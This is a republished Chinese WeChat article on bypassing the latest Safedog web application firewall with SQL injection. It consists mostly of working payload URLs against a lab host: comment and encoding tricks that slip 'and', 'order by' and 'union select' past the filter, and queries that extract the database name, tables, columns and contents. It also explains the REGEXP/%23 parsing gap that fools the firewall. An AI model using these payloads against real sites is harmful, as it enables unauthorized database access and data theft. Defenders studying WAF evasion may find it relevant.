sql注入bypass最新版某狗
2022-5-10 17:30:0 Author: mp.weixin.qq.com(查看原文) 阅读量:16 收藏

安全狗最新版本



and绕过

http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500011/

http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500012/

http://192.168.111.16/index.php?id=if((1=2),1,1)

http://192.168.111.16/index.php?id=1%20and/%!%22//1=1%20--%20+

order by 绕过

/*%!*干扰

http://192.168.111.16/index.php?id=1/%2a%%2f/order/%2f%2f/by/%2f%2f/2



union select 绕过


获取当前数据库和用户

数据库同理

http://192.168.111.16/index.php?id=-1/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,database(/%2f%2f/)

获取数据库表

http://192.168.111.16/index.php?id=1/%2a%%2f/union/%2f%2f//!50441select//%2f%2f/1,group_concat(table_name)%20from%20information_schema.tables%20where%20/wad/table_schema=database(////)

不拦截

http://192.168.111.16/index.php?id=-1%20/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3%20%20%0a%20%20from%20information_schema.tables%20where%20table_schema=database(////)

拦截

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3  %0a  from information_schema.tables where table_schema=database(////)

这里其实REGEXP "[…任意%23]"就行,在url解码%23变成了#,安全狗认为后面全都成为了注释符,带入到mysql层面其实%23只是正则的一个参数并不是注释符


获取表字段

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(column_name),3  %0a  from information_schema.columns where table_name="newss"

获取数据

http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,content,3  %0a  from newss

加下方微信,拉你一起进群学习

往期推荐

软件调试详解

初探windows异常处理

浅谈hook攻防

无处不在的dll劫持

CVE-2021–26855与CVE-2021–27065分析及复现

Windows环境下的调试器探究

构建API调用框架绕过杀软hook

记一次内网渗透靶场学习

hw面试题解答版

bypass Bitdefender



文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652887670&idx=2&sn=40b944b11c06b5487539c69de96a4294&chksm=bd59a6bb8a2e2fadd461aa4b7b806bf7f2aaafdb7d5a581b0b7a8bf395842869688229e13878#rd
如有侵权请联系:admin#unsafe.sh